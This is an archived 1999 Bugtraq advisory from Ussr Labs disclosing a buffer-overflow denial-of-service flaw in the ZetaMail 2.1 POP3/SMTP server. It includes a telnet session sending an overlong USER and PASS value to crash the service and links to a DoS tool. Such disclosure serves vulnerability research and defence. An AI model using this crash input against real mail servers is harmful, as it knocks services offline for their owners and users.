Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability

From: labs () USSRBACK COM (Ussr Labs)
Date: Fri, 19 Nov 1999 05:33:49 -0300

Remote D.o.S Attack in ZetaMail 2.1 Mail POP3/SMTP Server Vulnerability

PROBLEM

UssrLabs found a Local/Remote DoS Attack in ZetaMail 2.1 Mail POP3/SMTP
Server,
the buffer overflow is caused by a long user name/password, 3500 characters.

There is not much to expand on.... just a simple hole

Example:
[[gimmemore@itsme]$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK ZetaMail for 95 BD0211 <+OK ZetaMail for 95 BD0211 <4294764405.063903189415041@itsme>
USER {buffer)
+OK Send password
PASS  {buffer)

Overflow Crashh.

Where (buffer) is 3500 characters.

Binary / Source for the D.o.s for Windows / Linux:

http://www.ussrback.com/zmail/

Vendor Status:
 Contacted.

Credit: USSRLABS

SOLUTION
 install another program from the same vendor,
 MsgCore/95 2.11,MsgCore/NT 2.10

u n d e r g r o u n d  s e c u r i t y  s y s t e m s  r e s e a r c h
http://www.ussrback.com
Previous By Date Next
Previous By Thread Next

Current thread: